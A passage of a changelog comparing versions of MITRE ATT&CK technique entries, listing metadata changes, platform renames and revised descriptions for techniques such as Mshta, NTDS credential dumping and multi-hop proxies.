Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. |
| x_mitre_version | 1.3 | 1.4 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1078.003] Valid Accounts: Local Accounts
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:36:36.681000+00:00 | 2025-04-15 19:59:24.607000+00:00 |
| x_mitre_version | 1.4 | 1.5 |
| x_mitre_platforms[4] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1074.001] Data Staged: Local Data Staging
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-26 16:28:39.920000+00:00 | 2025-04-15 19:58:11.270000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1114.001] Email Collection: Local Email Collection
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-24 17:59:20.983000+00:00 | 2025-04-15 19:58:12.090000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1654] Log Enumeration
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 12:24:40.892000+00:00 | 2025-04-15 19:58:48.705000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1547.015] Boot or Logon Autostart Execution: Login Items
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-18 16:36:37.042000+00:00 | 2025-04-15 19:58:47.788000+00:00 |
| external_references[8]['description'] | fluffybunny. (2019, July 9). OSX.Dok Analysis. Retrieved October 4, 2021. | fluffybunny. (2019, July 9). OSX.Dok Analysis. Retrieved November 17, 2024. |
| external_references[8]['url'] | http://www.hexed.in/2019/07/osxdok-analysis.html | https://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html |
| external_references[3]['description'] | Tim Schroeder. (2013, April 21). SMLoginItemSetEnabled Demystified. Retrieved October 5, 2021. | Tim Schroeder. (2013, April 21). SMLoginItemSetEnabled Demystified. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://blog.timschroeder.net/2013/04/21/smloginitemsetenabled-demystified/ | https://web.archive.org/web/20160216034946/https://blog.timschroeder.net/2013/04/21/smloginitemsetenabled-demystified/ |
| x_mitre_version | 1.0 | 1.1 |
[T1059.011] Command and Scripting Interpreter: Lua
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | False | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-01 15:19:54.163000+00:00 | 2025-04-15 19:58:57.854000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1218.014] System Binary Proxy Execution: MMC
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Application control', 'Digital Certificate Validation'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-05-20 17:41:16.112000+00:00 | 2025-04-16 20:37:23.449000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 2.0 | 2.1 |
[T1127.001] Trusted Developer Utilities Proxy Execution: MSBuild
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['.NET Framework version 4 or higher'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-14 19:23:58.317000+00:00 | 2025-04-16 20:37:20.712000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.3 | 1.4 |
[T1071.003] Application Layer Protocol: Mail Protocols
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 12:28:59.928000+00:00 | 2025-04-15 19:58:32.320000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1134.003] Access Token Manipulation: Make and Impersonate Token
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Windows User Account Control', 'System access controls', 'File system access controls'] | |
| x_mitre_effective_permissions | ['SYSTEM'] | |
| x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-01-10 17:55:46.905000+00:00 | 2025-04-15 19:58:49.948000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1204.002] User Execution: Malicious File
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | False | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-25 20:50:34.876000+00:00 | 2025-04-15 19:58:13.883000+00:00 |
| x_mitre_version | 1.4 | 1.5 |
[T1204.003] User Execution: Malicious Image
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Adversaries may rely on a user running a malicious image to | t | Adversaries may rely on a user running a malicious image to |
| facilitate execution. Amazon Web Services (AWS) Amazon Machi | | facilitate execution. Amazon Web Services (AWS) Amazon Machi |
| ne Images (AMIs), Google Cloud Platform (GCP) Images, and Az | | ne Images (AMIs), Google Cloud Platform (GCP) Images, and Az |
| ure Images as well as popular container runtimes such as Doc | | ure Images as well as popular container runtimes such as Doc |
| ker can be backdoored. Backdoored images may be uploaded to | | ker can be backdoored. Backdoored images may be uploaded to |
| a public repository via [Upload Malware](https://attack.mitr | | a public repository via [Upload Malware](https://attack.mitr |
| e.org/techniques/T1608/001), and users may then download and | | e.org/techniques/T1608/001), and users may then download and |
| deploy an instance or container from the image without real | | deploy an instance or container from the image without real |
| izing the image is malicious, thus bypassing techniques that | | izing the image is malicious, thus bypassing techniques that |
| specifically achieve Initial Access. This can lead to the e | | specifically achieve Initial Access. This can lead to the e |
| xecution of malicious code, such as code that executes crypt | | xecution of malicious code, such as code that executes crypt |
| ocurrency mining, in the instance or container.(Citation: Su | | ocurrency mining, in the instance or container.(Citation: Su |
| mmit Route Malicious AMIs) Adversaries may also name images | | mmit Route Malicious AMIs) Adversaries may also name images |
| a certain way to increase the chance of users mistakenly de | | a certain way to increase the chance of users mistakenly de |
| ploying an instance or container from the image (ex: [Match | | ploying an instance or container from the image (ex: [Match |
| Legitimate Name or Location](https://attack.mitre.org/techni | | Legitimate Resource Name or Location](https://attack.mitre.o |
| ques/T1036/005)).(Citation: Aqua Security Cloud Native Threa | | rg/techniques/T1036/005)).(Citation: Aqua Security Cloud Nat |
| t Report June 2021) | | ive Threat Report June 2021) |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-08-26 16:42:35.318000+00:00 | 2025-04-15 19:58:58.109000+00:00 |
| description | Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021) | Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Resource Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021) |
| x_mitre_version | 1.1 | 1.2 |
[T1204.001] User Execution: Malicious Link
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | False | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-10 16:40:03.786000+00:00 | 2025-04-15 19:59:20.108000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1553.005] Subvert Trust Controls: Mark-of-the-Web Bypass
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Application Control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 14:19:50.768000+00:00 | 2025-04-15 19:58:45.702000+00:00 |
| external_references[1]['description'] | Beek, C. (2020, December 3). Investigating the Use of VHD Files By Cybercriminals. Retrieved February 22, 2021. | Beek, C. (2020, December 3). Investigating the Use of VHD Files By Cybercriminals. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316 | https://web.archive.org/web/20201203131725/https://christiaanbeek.medium.com/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
[T1036.008] Masquerading: Masquerade File Type
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Adversaries may masquerade malicious payloads as legitimate | t | Adversaries may masquerade malicious payloads as legitimate |
| files through changes to the payload's formatting, including | | files through changes to the payload's formatting, including |
| the file’s signature, extension, and contents. Various file | | the file’s signature, extension, icon, and contents. Variou |
| types have a typical standard format, including how they ar | | s file types have a typical standard format, including how t |
| e encoded and organized. For example, a file’s signature (al | | hey are encoded and organized. For example, a file’s signatu |
| so known as header or magic bytes) is the beginning bytes of | | re (also known as header or magic bytes) is the beginning by |
| a file and is often used to identify the file’s type. For e | | tes of a file and is often used to identify the file’s type. |
| xample, the header of a JPEG file, is <code> 0xFF 0xD8</cod | | For example, the header of a JPEG file, is <code> 0xFF 0xD |
| e> and the file extension is either `.JPE`, `.JPEG` or `.JPG | | 8</code> and the file extension is either `.JPE`, `.JPEG` or |
| `. Adversaries may edit the header’s hex code and/or the f | | `.JPG`. Adversaries may edit the header’s hex code and/or |
| ile extension of a malicious payload in order to bypass file | | the file extension of a malicious payload in order to bypas |
| validation checks and/or input sanitization. This behavior | | s file validation checks and/or input sanitization. This beh |
| is commonly used when payload files are transferred (e.g., [ | | avior is commonly used when payload files are transferred (e |
| Ingress Tool Transfer](https://attack.mitre.org/techniques/T | | .g., [Ingress Tool Transfer](https://attack.mitre.org/techni |
| 1105)) and stored (e.g., [Upload Malware](https://attack.mit | | ques/T1105)) and stored (e.g., [Upload Malware](https://atta |
| re.org/techniques/T1608/001)) so that adversaries may move t | | ck.mitre.org/techniques/T1608/001)) so that adversaries may |
| heir malware without triggering detections. Common non-exe | | move their malware without triggering detections. Common n |
| cutable file types and extensions, such as text files (`.txt | | on-executable file types and extensions, such as text files |
| `) and image files (`.jpg`, `.gif`, etc.) may be typically t | | (`.txt`) and image files (`.jpg`, `.gif`, etc.) may be typic |
| reated as benign. Based on this, adversaries may use a file | | ally treated as benign. Based on this, adversaries may use |
| extension to disguise malware, such as naming a PHP backdoo | | a file extension to disguise malware, such as naming a PHP b |
| r code with a file name of <code>test.gif</code>. A user may | | ackdoor code with a file name of <code>test.gif</code>. A us |
| not know that a file is malicious due to the benign appeara | | er may not know that a file is malicious due to the benign a |
| nce and file extension. Polygot files, which are files that | | ppearance and file extension. Polygot files, which are file |
| have multiple different file types and that function differ | | s that have multiple different file types and that function |
| ently based on the application that will execute them, may a | | differently based on the application that will execute them, |
| lso be used to disguise malicious malware and capabilities.( | | may also be used to disguise malicious malware and capabili |
| Citation: polygot_icedID) | | ties.(Citation: polygot_icedID) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-06-14 23:03:51.540000+00:00 | 2025-04-15 19:58:12.855000+00:00 |
| description | Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. For example, the header of a JPEG file, is 0xFF 0xD8 and the file extension is either `.JPE`, `.JPEG` or `.JPG`.
Adversaries may edit the header’s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and stored (e.g., [Upload Malware](https://attack.mitre.org/techniques/T1608/001)) so that adversaries may move their malware without triggering detections.
Common non-executable file types and extensions, such as text files (`.txt`) and image files (`.jpg`, `.gif`, etc.) may be typically treated as benign. Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of test.gif. A user may not know that a file is malicious due to the benign appearance and file extension.
Polygot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.(Citation: polygot_icedID) | Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, icon, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. For example, the header of a JPEG file, is 0xFF 0xD8 and the file extension is either `.JPE`, `.JPEG` or `.JPG`.
Adversaries may edit the header’s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and stored (e.g., [Upload Malware](https://attack.mitre.org/techniques/T1608/001)) so that adversaries may move their malware without triggering detections.
Common non-executable file types and extensions, such as text files (`.txt`) and image files (`.jpg`, `.gif`, etc.) may be typically treated as benign. Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of test.gif. A user may not know that a file is malicious due to the benign appearance and file extension.
Polygot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.(Citation: polygot_icedID) |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_contributors[1] | Ben Smith, @ezaspy | Ben Smith, @cyberg3cko |
[T1036] Masquerading
Current version: 1.8
Version changed from: 1.7 → 1.8
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Application Control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-16 20:10:38.450000+00:00 | 2025-04-15 19:58:26.186000+00:00 |
| x_mitre_version | 1.7 | 1.8 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1556] Modify Authentication Process
Current version: 2.6
Version changed from: 2.5 → 2.6
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:59:21.746000+00:00 |
| x_mitre_version | 2.5 | 2.6 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1601] Modify System Image
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-10-22 17:50:47.635000+00:00 | 2025-04-15 19:58:57.683000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[T1218.005] System Binary Proxy Execution: Mshta
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Application control', 'Digital Certificate Validation'] | |
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-11 20:38:28.802000+00:00 | 2025-04-15 19:58:47.701000+00:00 |
| x_mitre_version | 2.0 | 2.1 |
[T1218.007] System Binary Proxy Execution: Msiexec
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Digital Certificate Validation', 'Application control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-19 17:33:16.346000+00:00 | 2025-04-16 20:37:16.547000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 2.0 | 2.1 |
[T1556.006] Modify Authentication Process: Multi-Factor Authentication
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Multi-Factor Authentication'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:59.338000+00:00 |
| x_mitre_version | 1.3 | 1.4 |
[T1104] Multi-Stage Channels
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-07-14 19:43:38.181000+00:00 | 2025-04-15 19:58:48.060000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1090.003] Proxy: Multi-hop Proxy
Current version: 2.3
Version changed from: 2.2 → 2.3
|
|
|---|
| t | Adversaries may chain together multiple proxies to disguise | t | Adversaries may chain together multiple proxies to disguise |
| the source of malicious traffic. Typically, a defender will | | the source of malicious traffic. Typically, a defender will |
| be able to identify the last proxy traffic traversed before | | be able to identify the last proxy traffic traversed before |
| it enters their network; the defender may or may not be able | | it enters their network; the defender may or may not be able |
| to identify any previous proxies before the last-hop proxy. | | to identify any previous proxies before the last-hop proxy. |
| This technique makes identifying the original source of the | | This technique makes identifying the original source of the |
| malicious traffic even more difficult by requiring the defe | | malicious traffic even more difficult by requiring the defe |
| nder to trace malicious traffic through several proxies to i | | nder to trace malicious traffic through several proxies to i |
| dentify its source. For example, adversaries may construct | | dentify its source. For example, adversaries may construct |
| or use onion routing networks – such as the publicly availab | | or use onion routing networks – such as the publicly availab |
| le [Tor](https://attack.mitre.org/software/S0183) network – | | le [Tor](https://attack.mitre.org/software/S0183) network – |
| to transport encrypted C2 traffic through a compromised popu | | to transport encrypted C2 traffic through a compromised popu |
| lation, allowing communication with any device within the ne | | lation, allowing communication with any device within the ne |
| twork.(Citation: Onion Routing) Adversaries may also use ope | | twork.(Citation: Onion Routing) Adversaries may also use ope |
| rational relay box (ORB) networks composed of virtual privat | | rational relay box (ORB) networks composed of virtual privat |
| e servers (VPS), Internet of Things (IoT) devices, smart dev | | e servers (VPS), Internet of Things (IoT) devices, smart dev |
| ices, and end-of-life routers to obfuscate their operations. | | ices, and end-of-life routers to obfuscate their operations. |
| (Citation: ORB Mandiant) In the case of network infrastru | | (Citation: ORB Mandiant) In the case of network infrastruc |
| cture, it is possible for an adversary to leverage multiple | | ture, it is possible for an adversary to leverage multiple c |
| compromised devices to create a multi-hop proxy chain (i.e., | | ompromised devices to create a multi-hop proxy chain (i.e., |
| [Network Devices](https://attack.mitre.org/techniques/T1584 | | [Network Devices](https://attack.mitre.org/techniques/T1584/ |
| /008)). By leveraging [Patch System Image](https://attack.mi | | 008)). By leveraging [Patch System Image](https://attack.mit |
| tre.org/techniques/T1601/001) on routers, adversaries can ad | | re.org/techniques/T1601/001) on routers, adversaries can add |
| d custom code to the affected network devices that will impl | | custom code to the affected network devices that will imple |
| ement onion routing between those nodes. This method is depe | | ment onion routing between those nodes. This method is depen |
| ndent upon the [Network Boundary Bridging](https://attack.mi | | dent upon the [Network Boundary Bridging](https://attack.mit |
| tre.org/techniques/T1599) method allowing the adversaries to | | re.org/techniques/T1599) method allowing the adversaries to |
| cross the protected network boundary of the Internet perime | | cross the protected network boundary of the Internet perimet |
| ter and into the organization’s Wide-Area Network (WAN). Pr | | er and into the organization’s Wide-Area Network (WAN). Pro |
| otocols such as ICMP may be used as a transport. Similarl | | tocols such as ICMP may be used as a transport. Similarly |
| y, adversaries may abuse peer-to-peer (P2P) and blockchain-o | | , adversaries may abuse peer-to-peer (P2P) and blockchain-or |
| riented infrastructure to implement routing between a decent | | iented infrastructure to implement routing between a decentr |
| ralized network of peers.(Citation: NGLite Trojan) | | alized network of peers.(Citation: NGLite Trojan) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-25 20:48:24.411000+00:00 | 2025-04-15 19:58:56.270000+00:00 |
| description | Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing) Adversaries may also use operational relay box (ORB) networks composed of virtual private servers (VPS), Internet of Things (IoT) devices, smart devices, and end-of-life routers to obfuscate their operations. (Citation: ORB Mandiant)
In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan) | Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing) Adversaries may also use operational relay box (ORB) networks composed of virtual private servers (VPS), Internet of Things (IoT) devices, smart devices, and end-of-life routers to obfuscate their operations.(Citation: ORB Mandiant)
In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan) |
| x_mitre_version | 2.2 | 2.3 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | Network Devices |
| x_mitre_platforms | | ESXi |
iterable_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | Network | |
[T1003.003] OS Credential Dumping: NTDS
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['Access to Domain Controller or backup'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-07-28 14:41:38.908000+00:00 | 2025-04-15 19:59:19.862000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.2 | 1.3 |
[T1564.004] Hide Artifacts: NTFS File Attributes
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Host forensic analysis', 'Signature-based detection'] | |
| x_mitre_system_requirements | ['NTFS partitioned hard drive'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 15:27:29.615000+00:00 | 2025-04-15 19:59:20.821000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1106] Native API
Current version: 2.3
Version changed from: 2.2 → 2.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | False | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 15:25:57.058000+00:00 | 2025-04-15 19:58:23.043000+00:00 |
| x_mitre_version | 2.2 | 2.3 |
[T1546.007] Event Triggered Execution: Netsh Helper DLL
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-20 17:09:17.363000+00:00 | 2025-04-16 20:37:23.142000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[T1599.001] Network Boundary Bridging: Network Address Translation Traversal
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-10-21 01:45:58.951000+00:00 | 2025-04-15 19:58:30.055000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[T1599] Network Boundary Bridging
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Firewall', 'System Access Controls'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-05-05 05:05:44.200000+00:00 | 2025-04-16 20:37:19.349000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_platforms[0] | Network | Network Devices |
[T1556.004] Modify Authentication Process: Network Device Authentication
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-12-14 23:14:26.107000+00:00 | 2025-04-15 21:40:12.055000+00:00 |
| external_references[1]['description'] | Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020. | Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.mandiant.com/resources/synful-knock-acis | https://cloud.google.com/blog/topics/threat-intelligence/synful-knock-acis/ |
| x_mitre_version | 2.0 | 2.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[T1059.008] Command and Scripting Interpreter: Network Device CLI
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | True | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-19 20:28:09.848000+00:00 | 2025-04-16 20:37:18.015000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
